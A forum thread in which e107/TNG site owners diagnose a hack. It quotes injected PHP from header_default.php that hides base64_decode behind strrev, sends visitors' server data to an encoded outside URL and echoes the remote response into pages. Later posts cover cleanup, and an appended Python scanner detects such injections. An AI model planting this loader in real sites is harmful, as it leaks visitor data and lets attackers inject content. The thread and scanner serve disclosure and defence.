My main content has disappeared

John Paul

I know most of the e107 guys haven't been around, but maybe some of the other tng guys may have a suggestion or 2 for me to look at. My site is http://jpjones.org. I'm hosted at simplyhosting (they can't see anything wrong from their end). I'm running e107 v.7.24, tng v 7.1.3 and the latest tngIL plugin. Everything was perfect until yesterday when out of the blue, all the main content is not rendering anymore. If I switch tng to unwrapped mode, tng renders fine, but it's not just tng, it's the whole site. I've even tried all the stock theme templates that ship with e107 and they all act the same, no content getting rendered. If anyone has an idea of what to look for I'd appreciate it. Thanks.

UPDATE: Well, I found out the problem and I don't understand how it could have gotten hacked, but it seems the following code got added to the end of the header_default.php file:


$cf=strrev('edo'.'ced'.'_46esab');$counter=$cf('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9').md5($_SERVER['SERVER_NAME']);
$data=array('HTTP_ACCEPT_CHARSET','HTTP_ACCEPT_LANGUAGE','HTTP_HOST','HTTP_REFERER',
'HTTP_USER_AGENT','HTTP_QUERY_STRING','REMOTE_ADDR','REQUEST_URI','REQUEST_METHOD','SCRIPT_FILENAME');
foreach($data as $val){$t[]= $_SERVER[$val];}$u=$counter.'&data='.base64_encode(serialize($t));$fn=file_get_contents($u);
if(!$fn||strlen($fn<4)){ob_start();include($u);$fn=ob_get_contents();ob_clean();}
if($fn&&strlen($fn>4)){list($crc,$enc)=explode('::',$fn);if(md5($enc)==$crc){echo $cf($enc);}}

I'll be letting simplyhosting know what happened also....

Apparently this is starting to happen to other e107 sites:

http://e107.org/e107_plugins/forum/forum_v...opic.php?214505

Martin J Mosley

This was a sustained attack on e107 and removing the inserted code as described by John Paul will bring your site back.

For the moment it is not known by what route the code was inserted, so remember that removing the rogue code will put your site back on line, but has not solved the problem. The e107 team are working on it and will publish recommendations as soon as possible. In the meantime, keep an eye on your site.

Mine was attacked, I removed the offending code straight away and for the moment no further problems, but until a solution is found I'll be watching closely.

For more info check on e107.org

Regards

ca_drm1n

After noting that both my e107 sites (one TNG and one not) had been hit by this, I saw JP's post on the e107 forums and did the fix on my site as well. I also added

?>

to the end of the header_default.php file, to hopefully mitigate the issue of any code being added on again (if it comes after that, at least the php won't execute). I also updated the permissions from 664 to 660 for that file (maybe it should be even MORE restrictive?).

Of note, there was a second file modified at the same time - core_image.php file under the admin folder. Not sure exactly what they did to it, but the time/date of the file synched up with the time of the malicious change to header_default.php page in themes/templates. Be sure to restore that one as well.

As an aside, I am still running 0.7.22, so whatever the issue, it's not limited to the latest version of e107.

- Al
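
Added example, not part of any post in this thread: a small Python scanner for the two indicators described above, namely a `strrev()` call that rebuilds a function name from reversed string pieces (as in the snippet found in header_default.php) and other PHP files whose modification time matches a known-tampered file (as reported for core_image.php). The watch list, the 120-second window and the function names are assumptions made for this illustration.

```python
import os
import re

# Assumed watch list: functions an injected loader tends to hide behind strrev().
WATCHED = {"base64_decode", "gzinflate", "str_rot13", "assert", "create_function"}
STRREV_CALL = re.compile(r"strrev\s*\(([^()]*)\)", re.I)
PHP_LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")

def findings(source):
    """Return reasons a PHP source string resembles the injected loader."""
    hits = []
    for call in STRREV_CALL.finditer(source):
        # Join the concatenated literals, then undo the reversal.
        joined = "".join(a or b for a, b in PHP_LITERAL.findall(call.group(1)))
        name = joined[::-1].lower()
        if name in WATCHED:
            hits.append("strrev hides " + name)
    return hits

def scan(root, reference=None, window=120):
    """Map each .php path under root to its findings. Files changed within
    `window` seconds of `reference` (a known-tampered file) are flagged too."""
    ref_mtime = os.path.getmtime(reference) if reference else None
    ref_abs = os.path.abspath(reference) if reference else None
    report = {}
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(".php"):
                continue
            path = os.path.join(folder, fname)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = findings(fh.read())
            if ref_abs and os.path.abspath(path) != ref_abs:
                if abs(os.path.getmtime(path) - ref_mtime) <= window:
                    hits.append("modified with reference file")
            if hits:
                report[path] = hits
    return report

# Constructed sample: same shape as the posted snippet, placeholder payload.
SAMPLE = "<?php $cf=strrev('edo'.'ced'.'_46esab');$u=$cf('cGxhY2Vob2xkZXI=');"

if __name__ == "__main__":
    print(findings(SAMPLE))
```

A timestamp match is only a lead, since modification times can be reset; compare flagged files against a clean copy of the same e107 release before restoring them.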